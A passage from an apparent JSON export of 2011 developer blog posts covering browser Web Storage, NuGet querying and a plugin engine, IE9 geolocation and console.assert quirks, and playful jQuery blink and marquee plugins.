starting my session, meaning that I couldn’t save it as navigating to the login page would mean that my session was lost, since it only lived in the memory of the page. 
Another feature that I was wanting to have was support for leaving the site and coming back to resume a session.\nBut how do we deal with this, currently it’s just a JavaScript API, there’s no server logic for dealing with sessions, tracking time blocks, etc. I could add that in, but then I need to track anonymous users coming and going and they may not like that. Alternatively I could look into browser storage.\nIntroducing browser storageSomething that’s part of the HTML5 specification (seriously, what isn’t part of HTML5 these days :P) is Web Storage (Note: this is different to the Indexed Database) and Web Storage is like cookies, but on steroids.\nThere’s two types of Web Storage, localStorage and sessionStorage and these two ways which you can do browser-level storage.\nBoth types of storage inherit from the same storage sub type, meaning that their API is just the same and they also store data in the same manner. The way data is stored is as a basic key/ value storage, with the value really just being a string. The Web Storage options don’t support storing complex objects as objects so keep that in mind ;).\nlocalStorage The idea of localStorage is that of persistent data across browser sessions. By this I mean that if you close your browser window and then come back data you persisted into localStorage will still be there.\nAnything which is pushed into localStorage will reside in localStorage until it is removed explicitly, so keep that in mind if/ when you are pushing into localStorage\nsessionStorage The idea of sessionStorage is that of persistent data during the browser session, and what I mean is that while you’re navigating your site data in there will stay but once your browser session ends the data will be cleared out.\nWorking with StorageNow that we have a basic overview of the different storage types how do we go about using them?\nWell they are quite easy, both localStorage and sessionStorage reside off the window object, so they are globally accessible. Each type of Storage has three main methods you need to know, setItem, getItem and removeItem. These are the CRUD operations which are exposed from the Storage object.\nNote: there are a few other methods and properties I haven’t covered, such as clear if you want to remove everything.\nHere’s a basic example of how to use localStorage:\nlocalStorage.setItem('foo', 'bar'); console.log(localStorage.getItem('foo')); //bar localStorage.removeItem('foo'); console.log(localStorage.getItem('foo')); //undefined What we’re doing in this demo is adding an item to localStorage, reading it out and then removing it.\nThe exact same operations can be done with sessionStorage.\nWorking with complex objects As I mentioned earlier in the article only strings are handled by the Web Storage API, so how do you deal with a complex object? What would this do:\nlocalStorage.setItem('foo', { foo: 'bar' }); Well you’ll end up with [object Object] stored (well, maybe a bit different depending on browsers, but that’s what you get in IE9), and that’s not very useful. But the lovely thing about JavaScript is JSON, meaning you can convert an object to a string. 
This means that you can convert {foo: 'bar'} to "{"foo":"bar"}", and then we can push that into our Web Storage of choice.\nThe easiest way to do this is using the JSON object which current generation browsers have in them (if you’re using an older browser you can use this Douglas Crockford library, but chances are Web Storage isn’t available anyway :P).\nNow we can do this:\nlocalStorage.setItem('foo', JSON.stringify({ foo: 'bar' })); console.log(JSON.parse(localStorage.getItem('foo'))); //{ foo: 'bar' } For this we’ve used the JSON.stringify method, this will take a JavaScript object and produces a string. This isn’t limited to just objects, but can also take an Array and make a JSON string from it (but yes, I know arrays are really just objects anyway, but that’s semantics! :P).\nWe can then use the JSON.parse to convert the JSON string back to a JavaScript object, when we’re reading it back out of our Storage.\nBrowser SupportNow that you know all this cool stuff you hit an obvious question, what browsers can I use this with? and it’s a very good question. Here’s a list of what browsers I know it works with:\nIE8 & IE9 FireFox 3.5+ Chrome Safari Opera 10+ Basically any browser from the last few years support Web Storage, so keep that in mind.\nConclusionTo wrap up in this article we’ve looked at the idea of Web Storage and that there is two different types, localStorage if you want to persist across multiple browser sessions or sessionStorage if you want to persist for just the current browser session.\nWe’ve also looked at how to perform CRUD operations against it, using getItem to read, setItem to add and removeItem to delete and the fact that they allow strings only.\nWe finished up by looking at how to store complex objects into the Web Storage locations, using the JSON API.\n", "id": "2011-02-25-in-browser-storage" }, { "title": "Querying NuGet via LINQPad", "url": "https://www.aaron-powell.com/posts/2011-02-24-linqpad/", "date": "Thu, 24 Feb 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "How to dig into the NuGet feed easily", "content": "I was reading a blog post by Phil Haack today on How to find out which NuGet packages depend on yours and I decided I wanted to do a bit more digging into what I can find out about a package using NuGet’s OData feed.\nA cool feature of LINQPad is that it supports OData feeds, so you can add any OData feed and query against it.\nWell, NuGet is providing all its data via OData, so can we query it?\nSure!\nLet’s revisit the idea that Phil was talking about, finding out what packages depend on another one. Well since it’s just LINQ it’s really easy:\nThat’s all very cool but I decided to dig a bit deeper, I decided to do a simple bit of reporting, basically I’m interested to know this: What packages depend on package X and what version?.\nI decided to use Autofac as a baseline since I know it’s got a number of versions released on NuGet.\nWell it’s easy:\nstring packageName = "Autofac"; var dependencies = Packages .Where(x => x.Dependencies.Contains(packageName)) .ToList() .Select(x => new { Package = x, Dependencies = x.Dependencies.Split('|').Select(y => new { Name = y.Split(':')[0], Version = y.Split(':')[1] }) }) .GroupBy(x => x.Dependencies.Where(y => y.Name == packageName).Select(y => y.Version).First()) .OrderBy(x => x.Key.ToString()); dependencies.Dump(); Note: This is an OData feed so you’re limited to what queries are able to be done on the server. 
I’m not an OData expert (or really an OData user) so I’m doing most of it in memory once it’s returned.\nThis will then generate a report which you can browse to find out what packages depend on what version.\nIf you’re interested, at the time of writing here are the stats:\nLooks like there’s quite a spread of packages depending on the various Autofac versions ;).\n", "id": "2011-02-24-linqpad" }, { "title": "Creating a NuGet-based plugin engine", "url": "https://www.aaron-powell.com/posts/2011-02-20-creating-a-nuget-plugin-engine/", "date": "Sun, 20 Feb 2011 00:00:00 +0000", "tags": [ "nuget", "umbraco", "funnelweb" ], "description": "How to create a plugin engine using NuGet as the distribution format", "content": "Two of the main Open Source projects I work on have extensibility aspects to them, Umbraco and FunnelWeb.\nWe’re a bit early in the development cycle for Umbraco 5 to be diving into the packaging, but FunnelWeb is more at a point where we can dive into this. So it got me thinking: how would we go about creating a simple way for developers to share plugins or themes they’ve created?\nUmbraco 4.x runs a decent package engine, but it’s custom developed, running a custom server, and a bunch of other stuff. For a smallish Open Source project like FunnelWeb this is a large investment which we’d rather avoid. Also, with Umbraco 5 we’re looking at whether the custom-developed way is the best way to go or not, as again there is time and money that needs to be invested in it too.\nMy next thought was NuGet; it’s all the rage at the moment (rightly so), so I was wondering if we couldn’t just use it as our source?\nUnsurprisingly I’m not the first person to look at this, it’s powering Orchard’s gallery, but I couldn’t find any decent documentation on how to use it. So after cracking open the Orchard source and doing some investigation I worked out how it hangs together. In the rest of this article I’ll cover a very basic way to do it.\nWhat you’ll need\nThere are two things you need:\nA server\nA consumer\nThere’s a server available as part of the NuGet source code, or alternatively you can install the NuGet package for NuGet.Server ;).\nOnce you’ve installed the NuGet.Server package (I’m going to assume that you’ve done that) drop your own NuGet packages into the /Packages folder and you’re ready to go. If you want to test this, add it to Visual Studio and you can test it via http://<your url>/nuget/Packages.
Woot, one part down, now for the tricky part.\nConsuming a NuGet feed yourself\nLet’s build a little console app which will view our packages. First off you need to add a reference to NuGet.Core and then we can start coding.\nThe first thing you need is a repository which you’re going to work against:\nvar repo = PackageRepositoryFactory.Default.CreateRepository( new PackageSource("http://nuget.local/nuget/Packages", "Default")); It’s easiest to just use the default repository, unless you’re doing something truly scary, and for the PackageSource we’re providing a source which is the URL of the OData feed which our packages sit behind (you can give a file system path if you’re using that and it still works).\nFrom the repository you can:\nList the packages\nAdd a new package\nRemove a package\n(The last two I’m assuming are for the feature that’s being touted for NuGet 1.2 which allows you to push new packages from the NuGet console)\nThere’s a number of Extension Methods also available which make it easier to find packages, so you can do something like this:\nvar package = repo.FindPackage("My-Awesome-Package"); The next thing we want to do is install a package, and for this you need a PackageManager:\nvar packageManager = new PackageManager( repo, new DefaultPackagePathResolver("http://nuget.local/nuget/Packages"), new PhysicalFileSystem(Environment.CurrentDirectory + @"\\Packages") ); For this we need to provide the following:\nThe repository to install from\nA package path resolver, which takes the same path as the repository\nA folder to install the packages into; this could be your /bin if it’s a web app, or anything else you want\nThe PackageManager is what we use to integrate with our local application, and it’s responsible for the install and uninstall process:\npackageManager.InstallPackage(package, false); For this we’re providing:\nThe package to install (you can also provide the ID of the package)\nWhether or not you want dependencies resolved (false tells it to ignore dependencies)\nIt’s just that simple.
And to uninstall it’s equally simple:\npackageManager.UninstallPackage(package); Again, you just need to provide the package instance (or the ID of the package) to uninstall.\nConclusion\nAs you can see, with only a few lines of code you can create your own consumer of NuGet feeds:\nclass Program { static void Main(string[] args) { var repo = PackageRepositoryFactory.Default.CreateRepository( new PackageSource("http://nuget.local/nuget/Packages", "Default")); var packageManager = new PackageManager( repo, new DefaultPackagePathResolver("http://nuget.local/nuget/Packages"), new PhysicalFileSystem(Environment.CurrentDirectory + @"\\Packages") ); var package = repo.FindPackage("My-Awesome-Package"); packageManager.InstallPackage(package, false); Console.WriteLine("Installed!"); Console.Read(); packageManager.UninstallPackage(package); Console.WriteLine("Uninstalled!"); Console.Read(); } } So keep an eye on FunnelWeb as we work on using this to produce a theme and plugin engine.\nAnd who knows, this may also be the way we do the packager which will ship in Umbraco 5.\n", "id": "2011-02-20-creating-a-nuget-plugin-engine" }, { "title": "Are you Doin' Nothin'?", "url": "https://www.aaron-powell.com/posts/2011-02-18-doin-nothin/", "date": "Fri, 18 Feb 2011 00:00:00 +0000", "tags": [ "ruby", "web" ], "description": "Interested in tracking what doing nothing really means to you?", "content": "I’ve been interested in the impact that low-performing computers have on the overall efficiency of my daily output.\nTo this end I decided to put together a little website which you can monitor this with, and this site is Doin’ Nothin’.\nThis little site basically runs a JavaScript app on the front end which will track each time you start and stop the timer.\nThere is also a sign-up aspect to the site; if you are like me and want to see the long-term impact then you can register and save your sessions, and later review them. Hopefully in the future I’ll be able to add some features to this such as graphing the data and better session management. These are cool ideas, but I can’t be sure if I’ll get them done :P.\nSo go on, check it out, have a play :).\n", "id": "2011-02-18-doin-nothin" }, { "title": "How does Umbraco look in IE9 RC?", "url": "https://www.aaron-powell.com/posts/2011-02-11-umbraco-ie9rc/", "date": "Fri, 11 Feb 2011 00:00:00 +0000", "tags": [ "ie9", "umbraco" ], "description": "How does Umbraco look in IE9 RC?", "content": "Sexy!\nSeriously, the IE9 font rendering is just beautiful, the best of the current browser set.\nCompare that to Chrome, and notice the lack of antialiasing on the header text.\n", "id": "2011-02-11-umbraco-ie9rc" }, { "title": "Issue with Geolocation in IE9 RC", "url": "https://www.aaron-powell.com/posts/2011-02-11-ie9-rc-geolocation-issue/", "date": "Fri, 11 Feb 2011 00:00:00 +0000", "tags": [ "ie9", "web" ], "description": "A (known) issue with the IE9 RC geolocation API.", "content": "Update\nLooks like the server-side fix has been implemented and it now works just fine. Feel free to read on if you’re interested to know why it didn’t work for a period of time.\nYou’ve probably already heard that IE9 RC is available, and one of the features that has been included is the HTML5 Geolocation API.\nI decided to add that to a fun little website that Tatham Oddie and I built, isitbeerti.me; if you allow your location to be known you’ll be able to bring up a map of the route to where it is currently midday.
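Under the hood the location lookup boils down to something like this (a simplified sketch of the idea rather than the site’s actual code; showBeerTimeRoute is a made-up helper standing in for the map drawing):
// only ask for a position if the browser actually supports geolocation
if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(function (position) {
        // success: we now know roughly where the visitor is
        var lat = position.coords.latitude,
            lng = position.coords.longitude;
        showBeerTimeRoute(lat, lng); // hypothetical helper that plots the route to midday
    }, function (error) {
        // error: the user blocked the request or the lookup failed
        console.log('No location for you, error code ' + error.code);
    });
}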
The site is hardly useful, but fun nonetheless.\nBut there’s a problem: although geolocation is detected as being a browser feature, it fails for me in the IE9 RC.\nQuick Geolocation API primer\nAt last year’s REMIX conference Tatham gave a talk about Geolocation (link), and if you want a much more in-depth look at this check out his talk. Instead I’ll give a quick look at how to work with it in the browser.\nThe idea behind the new geolocation API is to have a JavaScript interface to the browser API which will be able to work out just where you’re browsing from.\nThis is pretty sweet, and very easy to use, with the basic implementation requiring just this:\nnavigator.geolocation.getCurrentPosition(function(position) { console.log(position); }); There are a few points to note about this:\nI’m only passing in a callback for the success event; I’m not passing in an error callback, nor am I passing in any position options (argument #3)\nI’m not checking if navigator.geolocation actually exists, so it’ll fail with a JavaScript error in older browsers\nCalling getCurrentPosition will check if the user has allowed the browser to share their location with the website; if it’s the first time you’ll receive a prompt, which you can choose to block (resulting in the error callback being invoked)\nThe issue with IE9 RC\nAs I mentioned there’s an issue with the IE9 RC: if you go to a website that requests location information, such as isitbeerti.me, even if I allow it the error callback is invoked. If I do the same thing in Chrome or the latest Firefox it works as advertised.\nWell, as it turns out this is a known issue with the RC, and a little birdy has told me that the cause is that the service used by the browser has an issue with DateTime objects which aren’t US formatted. Ironically it does work just fine in the USA, so it seems like an odd issue to have cropped up; after all, geolocation does imply something global ;).\nThe same little birdy has said that a fix is in the works, and luckily this is a service-level fix so hopefully they can roll it out without any browser changes.\nFingers crossed and we can make location-based websites for all major browser vendors soon.\n", "id": "2011-02-11-ie9-rc-geolocation-issue" }, { "title": "Blink and marquee!", "url": "https://www.aaron-powell.com/posts/2011-02-09-blinking-marquee/", "date": "Wed, 09 Feb 2011 00:00:00 +0000", "tags": [ "jquery", "doing-it-wrong", "web" ], "description": "Aww yeah, old-skool win", "content": "Recently I’ve blogged about creating a blink tag with jQuery, and I’ve also blogged about making a marquee tag.\nWell, can we combine them? Sure we can!
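In its simplest form combining them is just a case of calling both plugins on the same element (a quick sketch, assuming the blink and marquee plugins from the two earlier posts are already loaded on the page):
// blink the heading five times while scrolling it across once
$('h1').blink({ count: 5 });
$('h1').marquee({ count: 1 });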
But with $.Deferred() there’s some more cool things we can do, like this:\n$.when($('h1').blink({ count: 5 }), $('h1').marquee({ count: 1 })) .done(function() { $('h1').css('color', '#f00'); }); Once both the plugins have completed the text will turn red.\nWithout wanting to get too deep into how Deferred works (read the doco for that), the high-level view is that the done callback fires once all the methods passed into $.when have raised deferred.resolve (it only works if they use promise and such properly), so that’s how you can have a function invoked when all the deferred methods complete!\nHey, you could even do this:\n$.when($.get('/foo'), $('h1').blink({ count: 5 })) .done(function() { $('h1').css('color', '#f00'); }); Blink & AJAX, how awesome!\nHere’s a jsfiddle if you want to play too.\n", "id": "2011-02-09-blinking-marquee" }, { "title": "Implementing the marquee tag using jQuery", "url": "https://www.aaron-powell.com/posts/2011-02-09-marquee/", "date": "Wed, 09 Feb 2011 00:00:00 +0000", "tags": [ "jquery", "doing-it-wrong", "web", "javascript" ], "description": "This time we'll implement the marquee tag, just because we can!", "content": "It’s time for another foray into the good old days of HTML, and we’re going to look at how to build the <marquee> tag, which has also been gone for quite some time.\nAgain we’re going to use jQuery to help us out, so let’s see what we’re building:\n(function($) { $.fn.textWidth = function(){ var calc = '<span style="display:none">' + $(this).text() + '</span>'; $('body').append(calc); var width = $('body').find('span:last').width(); $('body').find('span:last').remove(); return width; }; $.fn.marquee = function() { var that = $(this), textWidth = that.textWidth(), offset = that.width(), width = offset, css = { 'text-indent' : that.css('text-indent'), 'overflow' : that.css('overflow'), 'white-space' : that.css('white-space') }, marqueeCss = { 'text-indent' : width, 'overflow' : 'hidden', 'white-space' : 'nowrap' }; function go() { if(width == (textWidth*-1)) { width = offset; } that.css('text-indent', width + 'px'); width--; setTimeout(go, 1e1); }; that.css(marqueeCss); width--; go(); }; })(jQuery); We then use it like this:\n$('h1').marquee(); As you can probably see this is a bit more involved than when we implemented the <blink> tag.\nBreaking it down\nFrom what you can see here we’ve actually got two plugins that I’m creating, the first one being textWidth, the other being the actual marquee.\nNote: I’ve actually used some code I found on the web for the textWidth plugin, which you can find here.\nText Width\nThe first issue we have to overcome is working out just how wide the piece of text we’re going to be moving is, otherwise we don’t really know what we’re going to be moving.\nThe piece of code we’re using for it is quite simple: all it does is create a hidden span that will contain only the text, and then get the size of that element.
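Used on its own it’s a one-liner (an illustrative sketch; the actual number depends on your font and text):
// how wide would this heading's text be when laid out on a single line?
var width = $('h1').textWidth();
console.log(width + 'px'); // e.g. "240px"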
It’s not 100% fool-proof, I’m not taking into account padding/margin/border on the span tag, but it’ll generally do the job.\nImplementing Marquee\nSo now that we’re able to work out the width of the text we can start implementing the full marquee plugin. The first thing we need to do is set up a few variables:\nthat will be a jQuery instance of the DOM elements we’ve selected\ntextWidth is, well, the text width\noffset is the full width of the element we’re working with\ncss will contain the original values of the styles we’re about to change for the marquee to work\nmarqueeCss is the set of CSS values we need to change\nAs you can see we are changing some CSS values, and what we are setting is:\ntext-indent, which we set to the full width of the element; this means that the text won’t start until it’s pushed off the edge of the element\noverflow, so the text doesn’t show up when we push the indent out we set the overflow to hidden\nwhite-space, this is an interesting one; there’s probably a better way to do this, but what it does is prevent the content from breaking to a new line when the width isn’t enough for the content to reside within. Combined with the overflow this means that the content stays on the one line and isn’t shown until we want it\nAgain we’re going to use the recursive setTimeout pattern, which I talked about here, but before we get started we want to update the CSS for the element and then do our first move, decreasing the width by 1px before we first call go.\nLet’s have another look at the go method:\nfunction go() { if(width == (textWidth*-1)) { width = offset; } that.css('text-indent', width + 'px'); width--; setTimeout(go, 1e1); }; This is why we need the textWidth: once we’ve moved the text all the way off the element we need to move it back to the right hand side so it starts all over again.\nWoo it’s so pretty.\nTime for sex appeal\nWhy don’t we add the ability to set the number of times to scroll, that’s an easy one to add:\n$.fn.marquee = function(args) { var that = $(this), textWidth = that.textWidth(), offset = that.width(), width = offset, css = { 'text-indent' : that.css('text-indent'), 'overflow' : that.css('overflow'), 'white-space' : that.css('white-space') }, marqueeCss = { 'text-indent' : width, 'overflow' : 'hidden', 'white-space' : 'nowrap' }, args = $.extend(true, { count: -1 }, args), i = 0; function go() { if(width == (textWidth*-1)) { i++; if(i == args.count) { that.css(css); return; } width = offset; } that.css('text-indent', width + 'px'); width--; setTimeout(go, 1e1); }; that.css(marqueeCss); width--; go(); }; Really all we’ve done here is allow an argument to be passed in, and each time we hit the left edge we increment the counter and check if we’ve done enough passes. When we have, we set the element back to its original state.\nNow you can run this if you want only two passes:\n$('h1').marquee({ count: 2 }); Next up we’ll add some speed; that’s just a matter of adding a speed property to the arguments and defaulting it to 1e1 so we keep our standard timing, as sketched below.
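The post skips this version of the code, so here’s a rough sketch of how it might look, building directly on the count version above (it assumes the textWidth helper from earlier is defined; treat it as an approximation rather than the author’s exact code):
(function($) {
    $.fn.marquee = function(args) {
        var that = $(this),
            textWidth = that.textWidth(),
            offset = that.width(),
            width = offset,
            css = {
                'text-indent' : that.css('text-indent'),
                'overflow' : that.css('overflow'),
                'white-space' : that.css('white-space')
            },
            marqueeCss = {
                'text-indent' : width,
                'overflow' : 'hidden',
                'white-space' : 'nowrap'
            },
            i = 0;

        // speed joins count in the defaults, keeping 1e1 (10ms) as the standard timing
        args = $.extend(true, { count: -1, speed: 1e1 }, args);

        function go() {
            if (width == (textWidth * -1)) {
                i++;
                if (i == args.count) {
                    that.css(css);
                    return;
                }
                width = offset;
            }
            that.css('text-indent', width + 'px');
            width--;
            setTimeout(go, args.speed); // the only other change: use args.speed instead of 1e1
        }

        that.css(marqueeCss);
        width--;
        go();
    };
})(jQuery);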
With that in place (the full version will be visible in the next parts anyway), you can just run:\n$('h1').marquee({ speed: 5 }); Now it goes twice as fast!\nBringing sexy backwards\nSo the next thing that’d be cool: let’s go from left to right, rather than right to left.\nFirst off we’ll add a new argument property, meaning we can pass args like this:\n{ leftToRight: true } Here’s the updated plugin:\n$.fn.marquee = function(args) { var that = $(this); var textWidth = that.textWidth(), offset = that.width(), width = offset, css = { 'text-indent' : that.css('text-indent'), 'overflow' : that.css('overflow'), 'white-space' : that.css('white-space') }, marqueeCss = { 'text-indent' : width, 'overflow' : 'hidden', 'white-space' : 'nowrap' }, args = $.extend(true, { count: -1, speed: 1e1, leftToRight: false }, args), i = 0, stop = textWidth*-1; function go() { if(width == stop) { i++; if(i == args.count) { that.css(css); return; } if(args.leftToRight) { width = textWidth*-1; } else { width = offset; } } that.css('text-indent', width + 'px'); if(args.leftToRight) { width++; } else { width--; } setTimeout(go, args.speed); }; if(args.leftToRight) { width = textWidth*-1; width++; stop = offset; } else { width--; } that.css(marqueeCss); go(); }; What we need to do now is change the start position: if we’re going left-to-right we set the initial indent to be the negative width of the text. I’ve also done some refactoring so there’s a preset value for the position we need to stop and reset from. By default this is the negative width of the text when we’re going right to left; when we’re going left to right we want it to be the full width of the content.\nAlso, the width that we’re tracking either gets increased or decreased, depending on which direction we’re going.\nSo we can go backwards like this:\n$('h1').marquee({ leftToRight: true }); Weeeeeeeeee!\nFinishing it off with $.Deferred\nWe looked at $.Deferred() as part of the <blink> tag implementation, so I won’t cover it in great depth here. Really all we have to do is create our $.Deferred() at the start of the plugin, return the promise at the end, and call resolve when the count is up.\nThere’s also a reject call to make sure that we can fail if the selector didn’t match anything.\nConclusion\nThis brings us to the conclusion of our fun with jQuery again, bringing back a good ol’ friend in the form of marquee.\nI’ve got a gist if you want the code and a jsfiddle if you want to play around with it.\nGo go gadget 1998 :D.\n", "id": "2011-02-09-marquee" }, { "title": "Implementing the blink tag using jQuery", "url": "https://www.aaron-powell.com/posts/2011-02-08-blink/", "date": "Tue, 08 Feb 2011 00:00:00 +0000", "tags": [ "jquery", "doing-it-wrong", "web", "javascript" ], "description": "How to implement the blink tag using jQuery and some silliness :P", "content": "Do you miss the good old days of the web where you had the <blink> tag? Oh, it was wonderful.\nWell, today I decided that I wanted to bring it back, damnit I want my text to blink!\nThanks to the wonders of jQuery this is a snap to build, in fact here it is:\n(function($) { $.fn.blinky = function() { var that = this; function go() { $(that).fadeOut().fadeIn(); setTimeout(go, 1e3); }; go(); }; })(jQuery); Now you can use it just like this:\n$('h1').blinky(); Woo, all your h1 elements are going to blink :D.\nBreaking it down\nTo make this work you need to run the code periodically, in my case I’m running it every 1000 milliseconds (1e3 is just a lazy way of doing
it, exponents are fun!). You could do this with the setInterval method, but setInterval isn’t great: if your code is going to take longer than the allocated time, it’ll start again before the previous run has finished!\nInstead I’m using the recursive setTimeout pattern, so let’s look at that.\nRecursive setTimeout pattern\nThis pattern is cropping up in some of the more popular frameworks, and the idea is that rather than executing on a particular interval, you execute again when the code you want to run has completed.\nHere’s a better example:\nfunction doStuff() { $.get('/foo', function(result) { //do something with the result setTimeout(doStuff, 1e4); }); } As you can see we’re doing an AJAX get which may take a while to complete, and once it does complete we’ll do it again 10 seconds (1e4 milliseconds) later. If I’d been using setInterval then there is the possibility of having two running at the same time, since the first hadn’t finished before the second started.\nSexing blink up\nSo now that we have a working <blink> simulator, let’s sex it up a bit. Why not make it so we can specify the speed at which it blinks:\n(function($) { $.fn.blinky = function(frequency) { frequency = frequency || 1e3; var that = this; function go() { $(that).fadeOut().fadeIn(); setTimeout(go, frequency); }; go(); }; })(jQuery); Now you can optionally pass in the frequency you want to blink at:\n$('h1').blinky(2e3); Woo-hoo, delayed blink!\nHow about we extend it so that you can specify the number of times you want to blink:\n(function($) { $.fn.blinky = function(args) { var opts = { frequency: 1e3, count: -1 }; args = $.extend(true, opts, args); var i = 0; var that = this; function go() { if(i == args.count) return; i++; $(that).fadeOut().fadeIn(); setTimeout(go, args.frequency); }; go(); }; })(jQuery); I’ve also refactored it to use an object literal for the arguments, using jQuery.extend, meaning you can do it like this:\n$('h1').blinky({ frequency : 2e3, count: 3 }); This will cause the h1 to blink 3 times over the course of 6 seconds, how pretty.\nMaking it REALLY sexy!\nI’m sure you’ve heard by now that jQuery 1.5 is out, and one of the new features of jQuery 1.5 is the Deferred object.
Full API doco is here, but the short of it is that Deferred is how the new AJAX API works (I suggest you check out the jQuery doco for the best explanation of it), and one of the really cool things is that you can use Deferred in your own API, so that when your operations finish it can raise a done or fail method, depending on what is happening.\nSince we have the ability to specify the number of times our blink will occur, why not use Deferred to call a method when we’re done? Seems like a good idea, right?\nThere’s plenty of examples on the web of how to use Deferred, but here’s a basic example:\nfunction doStuff() { //create an instance of deferred var dfd = $.Deferred(); $.get('/foo', function(result) { //do stuff with result //success, so we tell the deferred object to resolve itself return dfd.resolve(); }); //return a promise to be deferred return dfd.promise(); } The high-level workflow is:\nCreate a deferred object\nReturn a promise, to indicate that the deferred will complete at some point\nIn the get callback, when it completes, call the resolve method so anything listening to the deferred will be run\nNow let’s add it to our blink method:\n(function($) { $.fn.blinky = function(args) { var opts = { frequency: 1e3, count: -1 }; args = $.extend(true, opts, args); var i = 0; var that = this; var dfd = $.Deferred(); function go() { if(that.length == 0) { return dfd.reject(); } if(i == args.count) { return dfd.resolve(); } i++; $(that).fadeOut().fadeIn(); setTimeout(go, args.frequency); }; go(); return dfd.promise(); }; })(jQuery); With deferred we can now do this:\n$('h1') .blinky({ count: 2 }) .done(function() { $('h1').css('color', '#f00'); }); So once we’ve finished executing the two iterations of the blink, the h1 will turn red.\nWe’ve also got code in for a failure: if there was nothing found by our selector it’ll invoke the fail callback:\n$('foo') .blinky({ count: 2 }) .fail(function() { console.log('aww snap!'); }); Conclusion\nJust like that we’ve come to the end of our post. This isn’t really a useful jQuery plugin, in fact <blink> was a terrible idea; it’s more a way that we can investigate a few interesting points, such as:\nthe recursive setTimeout pattern for better control over delayed execution\nusing Deferred to execute code once we’re done without passing the callback as an argument\nIf anyone is interested the full code is available as a gist and I’ve created a playground on jsfiddle.\n", "id": "2011-02-08-blink" }, { "title": "LINQ in JavaScript, now with more ES5", "url": "https://www.aaron-powell.com/posts/2011-02-06-html5/", "date": "Sun, 06 Feb 2011 00:00:00 +0000", "tags": [ "javascript", "linq", "web", "linq-in-javascript" ], "description": "A look at the way ECMAScript 5 is improving LINQ in JavaScript", "content": "When I first wrote LINQ in JavaScript a few years ago it was just a thought experiment.\nSince then I’ve actually found that I want to use it, quite often in fact, and a lot of the reason I’ve been wanting this is because I’m lacking the ECMAScript 5 features which LINQ in JavaScript provides.\nECMAScript 5 quick primer\nA lot of people mistake many of the ECMAScript 5 (ES5) features for being HTML5, but they aren’t really; what we’re looking at here are the next features of JavaScript, and in particular the map/filter methods.\nThese methods are similar to the kind of things you’d expect from functional programming languages for working with arrays, as the quick sketch below shows.
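For example, here’s a minimal sketch of the two methods in an ES5-capable browser (the numbers are made up purely for illustration):
var scores = [3, 8, 15, 4, 23];

// filter: keep only the items that pass the test
var highScores = scores.filter(function (score) { return score > 5; }); // [8, 15, 23]

// map: transform each item into something new
var doubled = highScores.map(function (score) { return score * 2; }); // [16, 30, 46]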
The IE9 Test Drive actually has a good set of examples of using these new features.\nSo now that browsers are starting to come with built in methods like Array.prototype.map, which will transform the data into a new type or Array.prototype.filter, allowing us to conditionally remove items from the array, it’d make sense to actually use them.\nImproving LINQ in JavaScriptAs I said browsers are starting to ship with the new features on Array they are going to be a lot faster than anything written purely in JavaScript and residing in-browser.\nLet’s for example look at improving the Array.where method:\nArray.prototype.where = Array.prototype.filter || function (fn) { //implement a custom method } Here what we’re doing is executing the logic of:\nIf the Array.prototype.filter method exists assign it to Array.prototype.where If it doesn’t we’ll provide a custom method We can do the same thing with select and indexOf, using built-in methods from the Array.prototype chain.\nOther updatesWhile adding these updates I also decided to do some other performance tweaks:\nskip will now use Array.prototype.slice rather than iterating through the collection in JavaScript take also uses slice, but does a -1 multiplication so we go backwards through the collection groupBy has been cleaned up so there’s a few less lines of code in it select and where will pass in all the ES5 arguments when running in browsers that don’t support ES5 Feel free to check out the code from my bitbucket, and maybe some others than I will use it ;).\n", "id": "2011-02-06-html5" }, { "title": "Tweaking console.assert in IE9", "url": "https://www.aaron-powell.com/posts/2011-01-30-ie-9-console-assert/", "date": "Sun, 30 Jan 2011 00:00:00 +0000", "tags": [ "ie9", "javascript", "web" ], "description": "A small tweak to console.assert in IE9", "content": "Today while writing some JavaScript I was using the console.assert method to work out the state of things at different points in time.\nIf you’re not familiar with console.assert here’s the method signature:\nconsole.assert(expression, message[, object]) What this allows you to do is pass in an expression to be evaluated, a message to display when the expression is false and an optional object to dump.\nThis is really useful if you’re writing large chunks of JavaScript and you can’t/ don’t want to attach the debugger (common if you’re working with timeouts and intervals), you can have the application assertion results to the console to be observed.\nI was using this in Chrome and FireFox (since the machine I have at work only has XP so no IE9 :() and found it really useful to be able to log out the optional object.\nWhen doing so you end up with something like this:\nAs you can see you can inspect into the object that you dumped out. Sweet!\nSomething you may already be aware of is that IE9 also includes a console object (yay, no more alert debugging :P), and it also contains an implementation of console.assert. So I decided to test and see how it goes in IE9, and here’s what it looks like:\nOh dear, [object Object], where’s my object to inspect? This isn’t good now is it. The problem is that the IE9 console.assert method calls toString() on your object, resulting in the [object Object] output. It’s also right up against message.\nWell let’s fix it, the best thing about JavaScript is that you can just change stuff if you don’t like it. 
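To make the before and after easy to compare, this is the sort of call we’re talking about (the expression, message and object here are made up purely for illustration):
var user = { name: 'Aaron', age: 17 };

// the expression is false, so the message and the object should be logged
console.assert(user.age >= 18, 'user should be an adult', user);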
So here’s a method you can run in JavaScript to replace the out-of-the-box console.assert method:\n(function(assert) { console.assert = function(expression, message, object) { if(object) { //we only want to do this if they did provide an object assert(expression, message, ' >>> ' + JSON.stringify(object)); } else { assert(expression, message); } };\t})(console.assert); Here we’re creating an anonymous function that we’ll immediately execute, pass in the standard console.assert and then augment it with using JSON.stringify. The beauty of this is that the native method is still being called, but if you’re passing in an object we’re converting it to a JSON string first.\nNow when you do a console.assert and provide an object you get this:\nIt’s not perfect, you can’t inspect into the object since it’s just a string, but it does suite for a lot of purposes.\nJust don’t be silly and pass in jQuery as the object, you’ll end up with something quite large :P.\nDisclaimer: This was done against the IE9 Beta (build 9.0.7930.16406) so it may change by the time of official release.\nDisclaimer 2: Tested against the RC and it still doesn’t produce an object inspection so this work around is still handy.\n", "id": "2011-01-30-ie-9-console-assert" }, { "title": "Orchard & Umbraco - Managing Content", "url": "https://www.aaron-powell.com/posts/2011-01-27-managing-content/", "date": "Thu, 27 Jan 2011 00:00:00 +0000", "tags": [ "orchard", "umbraco" ], "description": "An overview of how to manage content in the two different CMSs", "content": "OverviewIn this article we’re going to continue our series in looking at the differences between Orchard and Umbraco. Today we’re going to be looking at managing content.\nThis is from a series in Orchard and Umbraco, the overview can be found here.\nFinding Content in OrchardWith Orchard you need use the navigation and go to the Content Items option:\nHere you’ll be presented with a screen which has all the items which you’ve created in your site:\nContent Item List\nThis is the source of all your needs, you can filter the list to the different content types, order them 